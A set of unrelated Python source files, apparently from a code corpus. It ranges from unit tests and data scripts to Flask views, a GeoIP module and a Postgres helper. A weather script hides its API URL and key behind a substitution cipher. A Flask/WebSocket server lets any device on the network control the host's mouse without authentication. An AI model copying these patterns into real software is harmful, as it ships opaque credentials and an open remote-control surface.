sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
import unittest
from karura.database_api import DatabaseAPI
class TestDatabaseAPI(unittest.TestCase):
DBNAME = "test_database_uri"
API = None
@classmethod
def setUpClass(cls):
cls.API = DatabaseAPI(alternative_db=cls.DBNAME)
cls.API.connect()
@classmethod
def tearDownClass(cls):
if cls.API is not None:
cls.API.close(with_drop=True)
def test_database(self):
self.assertEqual(self.API._get_database().name, self.DBNAME)
def test_user(self):
domain = "karura31"
user = "karura99"
password = "karura@1010"
gen_new = lambda: password + "__new_password"
self.assertRaises(Exception, lambda: self.API.register_user("", "", ""))
self.assertRaises(Exception, lambda: self.API.register_user("domain", "", ""))
self.assertRaises(Exception, lambda: self.API.register_user("domain", "user", ""))
self.assertRaises(Exception, lambda: self.API.register_user("domain", "", "password"))
self.assertRaises(Exception, lambda: self.API.register_user("", "user", ""))
self.assertRaises(Exception, lambda: self.API.register_user("", "user", "password"))
self.assertRaises(Exception, lambda: self.API.register_user("domain", "user", "pas"))
self.assertRaises(Exception, lambda: self.API.register_user("domain", "usr", "password"))
self.assertRaises(Exception, lambda: self.API.register_user("domain", "usr", "pas"))
user_obj = self.API.register_user(domain, user, password)
self.assertTrue(user_obj)
login = self.API.authenticate_user(domain, user, password)
self.assertTrue(login)
self.API.change_user_password(domain, user, password, gen_new())
login = self.API.authenticate_user(domain, user, gen_new())
self.assertTrue(login)
self.API.delete_user(domain, user, gen_new())
if __name__ == "__main__":
unittest.main()
| 2,052 | 655 |
#!/usr/bin/python
import pandas as pd
import sys
def main():
# fle_path = '/home/alex/workspace/ReportGen/python/BigBenchTimes.csv'
file_path = sys.argv[1]
df = pd.read_csv(file_path, sep=';')
df.to_excel("BigBenchTimes.xlsx")
print df.to_string()
if __name__ == '__main__':
main()
| 310 | 122 |
#!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import nameparser
import os
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
README = read('README.rst')
setup(name='nameparser',
packages = ['nameparser'],
description = 'A simple Python module for parsing human names into their individual components.',
long_description = README,
version = nameparser.__version__,
url = nameparser.__url__,
author = nameparser.__author__,
author_email = nameparser.__author_email__,
license = nameparser.__license__,
keywords = ['names','parser'],
classifiers = [
'Intended Audience :: Developers',
'Operating System :: OS Independent',
"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
'Programming Language :: Python',
'Development Status :: 5 - Production/Stable',
'Natural Language :: English',
"Topic :: Software Development :: Libraries :: Python Modules",
'Topic :: Text Processing :: Linguistic',
]
)
| 1,225 | 328 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 4 17:41:56 2018
@author: hubert kyeremateng-boateng
"""
import numpy as np
import pandas as pd
recipes = pd.read_csv('arp_dataset.csv', header=None)
recipes.rename(columns={0: 'name'}, inplace=True)
print(np.transpose(recipes)) | 300 | 125 |
import roll_dice as r #importing RollDice module
COUNT = 0 #initializing count
while True:
roll = input("Enter your choice(d/u/l/r): ").lower() #Pick your choice
if roll == 'down' or roll == 'd':
r.dice_down(r.res)
COUNT+=1
elif roll == 'up'or roll =='u':
r.dice_up(r.res)
COUNT+=1
elif roll == 'left'or roll =='l':
r.dice_left(r.res)
COUNT+=1
elif roll == 'right'or roll =='r':
r.dice_right(r.res)
COUNT+=1
elif roll == 'quit'or roll =='q': #To quit
print('\n')
print("number of times dices roll: ",COUNT)
for i in r.list_all:
r.dice(i)#To return all position of a dice
print("latest position of dice")
r.dice(r.res)
print('Thanks for Participation, Visit Again!!!')
break
else:
print('Invalid move\nPlease Make Correct Choice!!! ')
| 973 | 348 |
from flask import render_template, redirect, url_for, flash, request
from werkzeug.urls import url_parse
from flask_login import login_user, logout_user, current_user
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, DecimalField, BooleanField, SelectField, SubmitField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo
from flask_babel import _, lazy_gettext as _l
from werkzeug.datastructures import MultiDict
from .models.user import User
from .models.messages import *
from flask import Blueprint
bp = Blueprint('updateinformation', __name__)
class UpdateInformationForm(FlaskForm):
firstname = StringField(_l('First Name'), validators=[DataRequired()])
lastname = StringField(_l('Last Name'), validators=[DataRequired()])
email = StringField(_l('Email'), validators=[DataRequired(), Email()])
address = StringField(_l('Address'), validators=[DataRequired()])
password = PasswordField(_l('Password'), validators=[DataRequired()])
submit = SubmitField(_l('Update Information'))
@bp.route('/updateInformationPage', methods=['GET', 'POST'])
def updateInformationPage():
unread = num_unread()
form = UpdateInformationForm()
if request.method == 'GET':
form = UpdateInformationForm(formdata = MultiDict({
'firstname': current_user.firstname,
'lastname': current_user.lastname,
'email': current_user.email,
'address': current_user.address
}))
if current_user.is_authenticated:
if form.validate_on_submit():
if not(User.get_by_auth(current_user.email, form.password.data)):
flash('Wrong password!')
elif form.firstname.data == current_user.firstname and form.lastname.data == current_user.lastname and form.email.data == current_user.email and form.address.data == current_user.address:
flash('Please change something, or go back to My Account!')
elif User.update_information(current_user.id,
form.firstname.data,
form.lastname.data,
form.email.data,
form.address.data):
flash('Your information has been updated!')
return redirect(url_for('updateinformation.updateInformationPage'))
else:
flash('This email is already in use.')
else:
return redirect(url_for('productPage.productPage'))
return render_template('updateinformation.html', unread=unread,title='Update Information', form=form)
# balance = 0
# if current_user.is_authenticated:
# balance = User.get_balance(current_user.id)
| 2,756 | 717 |
import matplotlib.pyplot as plt
import numpy as np
divisions = ['Admin', 'Development', 'Lead', 'HR']
salary = [10, 14,20, 12]
age = [28, 30, 45, 32]
index = np.arange(4)
width = 0.3
plt.bar(index, salary, width, color='green', label='Salary')
plt.bar(index+width, age, width, color='blue', label='Age')
plt.title('Divisions Bar Chart')
plt.xlabel('Divisions')
plt.ylabel('NUmber')
plt.xticks(index+width/2, divisions)
plt.legend(loc='best')
plt.show()
| 457 | 198 |
from string import *
import json, sys
from urllib.request import urlopen
#parameters
params1 = "<||^{tss+^=r]^/\A/+|</`[+^r]`;s.+|+s#r&sA/+|</`y_w"
params2 = ':#%:%!,"'
params3 = "-#%&!&')&:-/$,)+-.!:-::-"
params4 = params2 + params3
params_id = "j+^^=.w"
unit = [ "k", "atm"]
data1 = printable
data2 = punctuation+ascii_uppercase+ascii_lowercase+digits
encrypt = str.maketrans(dict(zip(data1, data2)))
decrypt = str.maketrans(dict(zip(data2, data1)))
#obter função clima
def getWeather(weather):
lin = params1.translate(decrypt)
kim = params4.translate(decrypt)
idm = params_id.translate(decrypt)
link = urlopen(lin + weather + idm + kim).read()
getjson = json.loads(link)
#result = getjson.gets()
print("A previsao do tempo em {}".format(weather),'\n')
main = getjson.get("main", {"temp"})
main2 = getjson.get("main", {"pressure"})
main3 = getjson.get("main", {"humidity"})
main4 = getjson.get("main", {"temp_min"})
main5 = getjson.get("main", {"temp_max"})
main6 = getjson.get("main", {"tomorrow"})
wind = getjson.get("wind", {"speed"})
sys = getjson.get("sys", {"country"})
coord = getjson.get("coord", {"lon"})
coord1 = getjson.get("coord", {"lat"})
weth = getjson.get("weather", {"description"})
# output objects
#print("Description :",weth['description'])
print("Temperatura :",round(main['temp']-273), "deg")
print("Pressao :",main2["pressure"],"atm")
print("Umidade :",main3["humidity"])
print("Velocidade-vento :",wind['speed'],"mph")
print("Max-temp: {}c , Min-temp: {}c".format(round(main5['temp_max']-273),round(main4['temp_min']-273)))
print("Latitude :",coord['lat'])
print("Longitude :",coord['lon'])
print("Pais :",sys['country'])
ent = input() or "cacule"
try:
getWeather(ent)
except:
print("Coloque outra cidade")
finally:
print("\n")
print("Tschüss / Goodbye / Adeus") | 1,951 | 775 |
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import pprint
import sys
import time
from twitter.common import app
from twitter.common.recordio import RecordIO, ThriftRecordReader
from apache.thermos.common.ckpt import CheckpointDispatcher
from gen.apache.thermos.ttypes import RunnerCkpt, RunnerState, TaskState
app.add_option(
"--checkpoint",
dest="ckpt",
metavar="CKPT",
help="read checkpoint from CKPT")
app.add_option(
"--assemble",
dest="assemble",
metavar="CKPT",
default=True,
help="whether or not to replay the checkpoint records.")
def main(args):
values = app.get_options()
if len(args) > 0:
print("ERROR: unrecognized arguments: %s\n" % (" ".join(args)), file=sys.stderr)
app.help()
sys.exit(1)
if not values.ckpt:
print("ERROR: must supply --checkpoint", file=sys.stderr)
app.help()
sys.exit(1)
fp = file(values.ckpt, "r")
rr = ThriftRecordReader(fp, RunnerCkpt)
wrs = RunnerState(processes={})
dispatcher = CheckpointDispatcher()
try:
for wts in rr:
print('Recovering: %s' % wts)
if values.assemble is True:
dispatcher.dispatch(wrs, wts)
except RecordIO.Error as err:
print('Error recovering checkpoint stream: %s' % err, file=sys.stderr)
return
print('\n\n\n')
if values.assemble:
print('Recovered Task Header')
pprint.pprint(wrs.header, indent=4)
print('\nRecovered Task States')
for task_status in wrs.statuses:
print(' %s [pid: %d] => %s' % (
time.asctime(time.localtime(task_status.timestamp_ms / 1000.0)),
task_status.runner_pid,
TaskState._VALUES_TO_NAMES[task_status.state]))
print('\nRecovered Processes')
pprint.pprint(wrs.processes, indent=4)
app.main()
| 2,309 | 788 |
#!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import unittest
from titus.genpy import PFAEngine
from titus.errors import *
class TestLib1Fixed(unittest.TestCase):
def testToBytes(self):
engine, = PFAEngine.fromYaml('''
input: {type: fixed, name: Test, size: 10}
output: bytes
action:
fixed.toBytes: input
''')
self.assertEqual(engine.action("0123456789"), "0123456789")
def testFromBytes(self):
engine, = PFAEngine.fromYaml('''
input: bytes
output: {type: fixed, name: Test, size: 10}
action:
- let:
original:
type: Test
value: "0123456789"
- fixed.fromBytes: [original, input]
''')
self.assertEqual(list(map(ord, engine.action(""))), [48, 49, 50, 51, 52, 53, 54, 55, 56, 57])
self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 57])
self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
| 1,913 | 779 |
import warnings
import click
from ai.backend.cli.extensions import ExtendedCommandGroup
from ai.backend.client import __version__
from ai.backend.client.output import get_output_handler
from ai.backend.client.config import APIConfig, set_config
from ai.backend.client.cli.types import CLIContext, OutputMode
@click.group(
cls=ExtendedCommandGroup,
context_settings={
'help_option_names': ['-h', '--help'],
},
)
@click.option('--skip-sslcert-validation',
help='Skip SSL certificate validation for all API requests.',
is_flag=True)
@click.option('--output', type=click.Choice(['json', 'console']), default='console',
help='Set the output style of the command results.')
@click.version_option(version=__version__)
@click.pass_context
def main(ctx: click.Context, skip_sslcert_validation: bool, output: str) -> None:
"""
Backend.AI command line interface.
"""
from .announcement import announce
config = APIConfig(
skip_sslcert_validation=skip_sslcert_validation,
announcement_handler=announce,
)
set_config(config)
output_mode = OutputMode(output)
cli_ctx = CLIContext(
api_config=config,
output_mode=output_mode,
)
cli_ctx.output = get_output_handler(cli_ctx, output_mode)
ctx.obj = cli_ctx
from .pretty import show_warning
warnings.showwarning = show_warning
| 1,414 | 415 |
"""
The country module contains the processing_country class.
"""
from os import path
import geoip2.database
from cybercaptain.utils.exceptions import ValidationError
from cybercaptain.processing.base import processing_base
from cybercaptain.utils.jsonFileHandler import json_file_reader, json_file_writer
class processing_country(processing_base):
"""
The country class allows to map a given IP to an ISO 3166-1 alpha-2 country code and add it to the datasets.
Please provide a MaxMind GeoLite2-Country DB (.mmdb) yourself via the maxMindDbPath attribute.
Important: This module will NOT work with a City, Anonymous, ASN, Connection-Type, ... MaxMind database! Only country supported!
**Parameters**:
kwargs :
contains a dictionary of all attributes.
**Script Attributes**:
ipInputAttribute:
a str to where the IP attribute can be found in the give source dataset.
outputAttribute:
a str to where (& which key) output the ISO 3166-1 alpha-2 country code.
maxMindDbPath:
a str to where the maxmind GeoIP database is located.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.validate(kwargs)
# If subclass needs special variables define here
self.ip_input_attribute = kwargs.get("ipInputAttribute")
self.output_attribute = kwargs.get("outputAttribute")
self.max_mind_db_path = kwargs.get("maxMindDbPath")
def run(self):
"""
Runs the clean algorythm.
**Returns**:
``True`` if this run succeeded.
``False`` if this run did not succeed.
"""
self.cc_log("INFO", "Data Processing Country: Started")
self.cc_log("DEBUG", "Trying to open the MaxMind GeoLite2-Country DB, please wait!")
try:
db = geoip2.database.Reader(self.max_mind_db_path)
except Exception as e:
self.logger.exception(e)
self.cc_log("ERROR", "Failed to open the MaxMind GeoLite2-Country DB at %s - please check the file!" % (self.max_mind_db_path))
return False
self.cc_log("DEBUG", "Opened the MaxMindGeoLite2-Country DB!")
json_fr = json_file_reader(self.src)
json_fw = json_file_writer(self.target)
self.cc_log("INFO", "Started to lookup ips and write into the target, please wait!")
while not json_fr.isEOF():
data = json_fr.readRecord()
country_code = "-99"
found_ip = data
for attribute in self.ip_input_attribute.split('.'):
found_ip = found_ip[attribute]
if not found_ip or found_ip == data:
self.cc_log("WARNING", "No IP found at the give ipInputAttribute place - Add country code -99 to this dataset!")
else:
# Lookup ip for country
try:
ip_info = db.country(found_ip)
if ip_info.country.iso_code: country_code = ip_info.country.iso_code
self.cc_log("DEBUG", "Found country code %s for ip %s" % (ip_info.country.iso_code, found_ip))
except Exception as e:
self.cc_log("WARNING", "No country code found for ip %s - add -99 to country code" % (found_ip))
data[self.output_attribute] = country_code
json_fw.writeRecord(data)
json_fr.close()
json_fw.close()
db.close()
self.cc_log("INFO", "Data Processing Country: Finished")
return True
def validate(self, kwargs):
"""
Validates all arguments for the country module.
kwargs(dict): contains a dictionary of all attributes.
"""
super().validate(kwargs)
self.cc_log("INFO", "Data Processing Country: started validation")
if not kwargs.get("ipInputAttribute"): raise ValidationError(self, ["ipInputAttribute"], "Parameter cannot be empty!")
if not kwargs.get("outputAttribute"): raise ValidationError(self, ["outputAttribute"] , "Parameters cannot be empty!")
if "." in kwargs.get("outputAttribute"): raise ValidationError(self, ["outputAttribute"] , "Parameters outputAttribute can not be a nested attribute - please configure a toplevel key!")
if not kwargs.get("maxMindDbPath"): raise ValidationError(self, ["maxMindDbPath"] , "Parameters cannot be empty!")
if ".mmdb" not in kwargs.get("maxMindDbPath"): raise ValidationError(self, ["maxMindDbPath"] , "Please only configure MaxMind-DBs for the path (.mmdb)!")
if not path.isfile(kwargs.get("maxMindDbPath")): raise ValidationError(self, ["maxMindDbPath"] , "Please configure an existing path to an existing MaxMind-DB!")
self.cc_log("INFO", "Data Processing Country: finished validation") | 4,849 | 1,372 |
# Generated by Django 3.0.2 on 2020-01-21 06:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('persons', '0010_attendee_address'),
('whereabouts', '0008_room'),
]
operations = [
migrations.AddField(
model_name='address',
name='attendees',
field=models.ManyToManyField(through='persons.AttendeeAddress', to='persons.Attendee'),
),
]
| 473 | 163 |
# skeleton
class Car:
def __init__(self, name, mileage, max_fuel):
self.name = name
self.mileage = mileage
self.max_fuel = max_fuel
self.fuel = self.max_fuel
self.dist = 0
def status(self):
''' Show the current status of the car
it should be called after brrr() and gas_statation()
<<< Template >>>
Car name: [car name]
Mileage: [mileage]km/L
Fuel: [Current fuel]L / [Max fuel]L
Distance: [Total Distance]km
if fuel < 20 %, print this:
"WARNING: remaining fuel is too low"
'''
print("Car name: " + self.name)
print("Mileage: " + str(self.mileage) + "km/L")
print("Fuel: " + str(self.fuel) + "L" + " / " + str(self.max_fuel) + "L")
print("Distance: " + str(self.dist) + "km")
def brrr(self, km):
'''
Drive [km]km. You should implement:
- distance increases as you drive
- fuel decreases as you use
- if the fuel is empty, then you cannot go more
(+ print, "EMPTY!")
'''
for i in range(km):
if self.fuel > 1 / self.mileage: # it can go
self.fuel = self.fuel - 1 / self.mileage
self.dist = self.dist + 1
else: # it cannot go
break
self.status()
def gas_station(self):
self.fuel = self.max_fuel
self.status()
benz = Car("Benz", 25, 100)
benz.brrr(10000)
benz.gas_station()
benz.brrr(1000)
benz.gas_station()
| 1,411 | 527 |
import socket
import pynput
from gevent import pywsgi
from flask_sockets import Sockets
from flask import Flask, request, render_template
from geventwebsocket.handler import WebSocketHandler
app = Flask(__name__)
sockets = Sockets(app)
mouse = pynput.mouse.Controller()
@app.route("/", methods=['GET', 'POST'])
def index():
return render_template("index.html")
@app.route("/mouse/get/", methods=["GET"])
def getMousePosition():
# y, x
return str(int(mouse.position[0])) + "," + str(int(mouse.position[1]))
@sockets.route('/mouse/set/')
def setMouse(ws):
while not ws.closed:
message = ws.receive()
if message is not None:
if message.startswith("move"):
print("mouse move")
xy = message[10:].split(",")
mouse.position = (float(xy[1]), float(xy[0]))
if message.startswith("scroll"):
print("mouse scroll")
xy = message[10:].split(",")
mouse.scroll(float(xy[1]), float(xy[0]))
ws.send("success")
else:
print("no receive")
@app.route("/mouse/click/", methods=["GET"])
def clickMouse():
ms = request.args.get("mouse")
print("mouse click " + ms)
if ms == "left":
mouse.click(pynput.mouse.Button.left)
else:
mouse.click(pynput.mouse.Button.right)
return "success"
def getIp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
if __name__ == "__main__":
# app.run("0.0.0.0", "8000", debug=True)
server = pywsgi.WSGIServer(("0.0.0.0", 8000), app, handler_class=WebSocketHandler)
print("server start at")
print("http://{}:8000".format(getIp()))
print("请在局域网另一个设备进行访问,可将那个设备作为本设备的触控板")
print("注意请将设备顺时针旋转90度使用")
server.serve_forever() | 1,855 | 686 |
from pathlib import Path
from typing import Tuple
from netCDF4 import Dataset
import xarray
import numpy as np
from datetime import datetime, timedelta
from dateutil.parser import parse
def load(
fn: Path, tlim: Tuple[datetime, datetime] = None, elevlim: Tuple[float, float] = None
) -> xarray.Dataset:
"""
This function works with 1983-2010 netCDF3 as well as 2011-present netCDF4 files.
"""
fn = Path(fn).expanduser()
# %% date from filename -- only way
ext = fn.suffix.lower()
if ext == ".nc":
d0 = datetime.strptime(fn.stem[13:21], "%Y%m%d")
elif ext == ".pf":
year = int(fn.stem[4:8])
days = int(fn.stem[8:11])
d0 = datetime(year, 1, 1) + timedelta(days=days - 1)
with Dataset(fn, "r") as f:
# %% load by time
secdayutc = f["Time"][:]
# convert to datetimes -- need as ndarray for next line
t = np.array([d0 + timedelta(seconds=int(s)) for s in secdayutc])
if tlim is not None and len(tlim) == 2:
if isinstance(tlim[0], str):
tlim = [parse(t) for t in tlim]
tind = (tlim[0] <= t) & (t <= tlim[1])
else:
tind = slice(None)
# %% elevation from North horizon
"""
elevation is not stored anywhere in the data files...
"""
elv = np.arange(181.0)
if elevlim is not None and len(elevlim) == 2:
elind = (elevlim[0] <= elv) & (elv <= elevlim[1])
else:
elind = slice(None)
# %% wavelength channels
wavelen = (f["Wavelength"][:] * 10).astype(int)
goodwl = wavelen > 1 # some channels are unused in some files
# %% load the data
# Analog=f['AnalogData'][tind,:]
# Ibase=f['BaseIntensity'][tind,goodwl,elind]
Ipeak = f["PeakIntensity"][tind, :, elind] # time x wavelength x elevation angle
if Ipeak.shape[1] != wavelen.size:
wavelen = wavelen[goodwl]
# %% root out bad channels 2011-03-01 for example
goodwl &= ~(Ipeak == 0).all(axis=(0, 2))
wavelen = wavelen[goodwl]
"""
astype(float) is critical to avoid overflow of int16 dtype!
"""
Ipeak = f["PeakIntensity"][tind, goodwl, elind].astype(float)
# %% filter factor per wavelength Rayleigh/PMT * 128
filtfact = f["FilterFactor"][goodwl]
# %% assemble output
R = xarray.Dataset(coords={"time": t[tind], "elevation": elv[elind]})
for i, w in enumerate(wavelen.astype(str)):
R[w] = (("time", "elevation"), Ipeak[:, i, :] * filtfact[i].astype(float) / 128.0)
return R
| 2,652 | 970 |
# -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import daiquiri
import yaml
LOG = daiquiri.getLogger(__name__)
with open(os.getenv("MERGIFYENGINE_SETTINGS", "fake.yml")) as f:
CONFIG = yaml.safe_load(f.read())
globals().update(CONFIG)
def log():
LOG.info("##################### CONFIGURATION ######################")
for name, value in CONFIG.items():
if (name in ["PRIVATE_KEY", "WEBHOOK_SECRET", "OAUTH_CLIENT_ID",
"OAUTH_CLIENT_SECRET", "MAIN_TOKEN", "FORK_TOKEN"] and
value is not None):
value = "*****"
if "URL" in name and value is not None:
value = re.sub(r'://[^@]*@', "://*****@", value)
LOG.info("* MERGIFYENGINE_%s: %s", name, value)
LOG.info("##########################################################")
| 1,402 | 468 |
# This implementation as of July 19 2017 has these resource utilizations of the mongodb container:
# - 2 million entries: 1.50 Gb
# - 3 million entries: 2.05 Gb
# The entire docker application was given 6 Gb to use, when given the default 2 Gb,
# the process would frequently crash before 1 million entries were downloaded.
import argparse
import unicodecsv as csv
import pymongo
import tarfile
import sys
import logging
import datetime
from api.web.request import AccessTypeList
from api import config
from api.handlers.reporthandler import AccessLogReport, ACCESS_LOG_FIELDS
ARG_TO_PARAMS= {
'l': 'limit',
's': 'start_date',
'e': 'end_date',
'u': 'uid',
'j': 'subject',
'p': 'project',
't': 'access_types'
}
def download_large_csv(params):
"""
Script to download large csv files to avoid uwsgi worker running out of memory.
"""
entries = int(params['limit'])
params['csv'] = "true"
params['bin'] = "true"
params['limit'] = "100000"
csv_file = open('accesslog.csv', 'w+')
writer = csv.DictWriter(csv_file, ACCESS_LOG_FIELDS)
writer.writeheader()
unicode_err_count = 0
while entries > 0:
print "{} entries left".format(entries)
params['limit'] = str(min(entries, 100000))
report = AccessLogReport(params)
rep = report.build()
end_date = str(rep[-1]['timestamp'])
for doc in rep[:-1]:
entries = entries - 1
writer.writerow(doc)
if len(rep) == 1:
entries = 0
writer.writerow(rep[0])
if len(rep) < int(params['limit']) - 1:
entries = 0
csv_file.flush()
params['end_date'] = end_date
print "Encountered unicode errors and skipped {} entries".format(unicode_err_count)
csv_file.close()
def format_arg(args):
return {ARG_TO_PARAMS[arg]: args[arg] for arg in args if args[arg] != None}
if __name__ == '__main__':
try:
parser = argparse.ArgumentParser()
parser.add_argument("-s", help="Start date", type=str)
parser.add_argument("-e", help="End date", type=str)
parser.add_argument("-u", help="User id", type=str)
parser.add_argument("-l", help="Limit", type=str)
parser.add_argument("-j", help="subJect", type=str)
parser.add_argument("-p", help="project", type=str)
parser.add_argument("-t", help="list of access Types", type=str, nargs='+')
args = vars(parser.parse_args())
download_large_csv(format_arg(args))
except Exception as e:
logging.exception('Unexpected error in log_csv.py')
sys.exit(1)
| 2,735 | 868 |
"""Module describes a :class:`DatabaseSource` for local postgres databases."""
import subprocess
from galaxy.util import unicodify
from planemo.io import communicate
from .interface import DatabaseSource
class ExecutesPostgresSqlMixin:
def list_databases(self):
"""Use `psql --list` to generate a list of identifiers."""
command_builder = self._psql_command_builder("--list")
stdout = unicodify(self._communicate(command_builder))
output_lines = stdout.splitlines()
identifiers = []
for line in output_lines:
identifiers.append(line.split("|")[0].strip())
return [i for i in identifiers if i]
def create_database(self, identifier):
"""Use `psql -c "create database"` to create a database."""
sql = "create database %s;" % identifier
self._run_sql_command(sql)
def delete_database(self, identifier):
"""Use `psql -c "drop database"` to delete a database."""
sql = "drop database %s;" % identifier
self._run_sql_command(sql)
def _run_sql_command(self, sql):
# communicate is just joining commands so we need to modify the
# sql as an argument - it shouldn't do this.
sql_arg = '%s' % sql
command_builder = self._psql_command_builder("--command", sql_arg)
self._communicate(command_builder)
def _communicate(self, command_builder):
stdout, _ = communicate(
command_builder.command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
return stdout
class LocalPostgresDatabaseSource(ExecutesPostgresSqlMixin, DatabaseSource):
"""Local postgres database source managed through psql application."""
def __init__(self, **kwds):
"""Construct a postgres database source from planemo configuration."""
self.psql_path = kwds.get("postgres_psql_path", None) or 'psql'
self.database_user = kwds.get("postgres_database_user", None)
self.database_host = kwds.get("postgres_database_host", None)
self.database_port = kwds.get("postgres_database_port", None)
self._kwds = kwds
def sqlalchemy_url(self, identifier):
"""Return URL or form postgresql://username:password@localhost/mydatabase."""
hostname = self.database_host or "localhost"
if self.database_port:
hostname += ":%s" % self.database_port
return "postgresql://%s@%s/%s" % (
self.database_user,
hostname,
identifier
)
def _psql_command_builder(self, *args):
command_builder = _CommandBuilder(self.psql_path)
# Print only tuples so output is easier to parse
command_builder.append_command("--tuples-only")
# Specify connection information
if self.database_user:
command_builder.append_command("--username", self.database_user)
if self.database_host:
command_builder.append_command("--host", self.database_host)
if self.database_port:
command_builder.append_command("--port", self.database_port)
command_builder.append_command("-P", "pager=off")
command_builder.extend_command(args)
return command_builder
class _CommandBuilder(object):
def __init__(self, *args):
self.command = list(args)
def append_command(self, *args_or_none):
args_or_none = args_or_none or []
for arg_or_none in args_or_none:
if arg_or_none is not None:
self.command.append(arg_or_none)
def extend_command(self, args):
for arg in (args or []):
self.append_command(arg)
__all__ = (
"LocalPostgresDatabaseSource",
)
| 3,740 | 1,069 |
#!/usr/bin/env python
# Copyright 2017 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from mock import MagicMock
from nmoscommon.mdns.mdnsCallbackHandler import MDNSAdvertisementCallbackHandler
class TestMDNSCallbackHandler(unittest.TestCase):
def setUp(self):
self.callback = MagicMock()
self.dut = MagicMock()
self.name = "testName"
self.regtype = "_nmos-test._tcp"
self.port = 8080,
self.txtRecord = {}
self.dut = MDNSAdvertisementCallbackHandler(
self.callback,
self.regtype,
self.name,
self.port,
self.txtRecord
)
def build_expected(self, action):
return {
"action": action,
"name": self.name,
"regtype": self.regtype,
"port": self.port,
"txtRecord": self.txtRecord
}
def check_callback_test(self, action):
argv, kwargs = self.callback.call_args
expected = self.build_expected(action)
actual = argv[0]
self.assertDictEqual(actual, expected)
def test_collision(self):
self.dut.entryCollision()
self.check_callback_test("collision")
def test_failed(self):
self.dut.entryFailed()
self.check_callback_test("failed")
def test_established(self):
self.dut.entryEstablished()
self.check_callback_test("established")
if __name__ == "__main__":
unittest.main()
| 2,029 | 603 |
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from .models import Post
from .forms import PostForm
@login_required
def add_post_view(request):
if request.method == "POST":
form = PostForm(request.POST, request.FILES)
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user
obj.save()
form = PostForm()
template_name = "posts/add_post.html"
context = {
"form":form
}
return render(request, template_name, context)
def display_posts_view(request):
posts = Post.objects.all()
template_name = "posts/display_posts.html"
context = {
"posts":posts
}
return render(request, template_name, context)
def detail_post_view(request, slug):
post = Post.objects.get(slug=slug)
template_name = "posts/detail_post.html"
context = {
"post":post
}
return render(request, template_name, context)
| 882 | 308 |
"""
Utilities - CVPRO
BY: MOHAK BAJAJ
CODING HEAVEN
"""
import math
import time
import logging
import cv2
import numpy as np
import copy
def stackImages(_imgList, cols, scale):
"""
Stack Images together to display in a single window
:param _imgList: list of images to stack
:param cols: the num of img in a row
:param scale: bigger~1+ ans smaller~1-
:return: Stacked Image
"""
imgList = copy.deepcopy(_imgList)
# make the array full by adding blank img, otherwise the openCV can't work
totalImages = len(imgList)
rows = totalImages // cols if totalImages // cols * \
cols == totalImages else totalImages // cols + 1
blankImages = cols * rows - totalImages
width = imgList[0].shape[1]
height = imgList[0].shape[0]
imgBlank = np.zeros((height, width, 3), np.uint8)
imgList.extend([imgBlank] * blankImages)
# resize the images
for i in range(cols * rows):
imgList[i] = cv2.resize(imgList[i], (0, 0), None, scale, scale)
if len(imgList[i].shape) == 2:
imgList[i] = cv2.cvtColor(imgList[i], cv2.COLOR_GRAY2BGR)
# put the images in a board
hor = [imgBlank] * rows
for y in range(rows):
line = []
for x in range(cols):
line.append(imgList[y * cols + x])
hor[y] = np.hstack(line)
ver = np.vstack(hor)
return ver
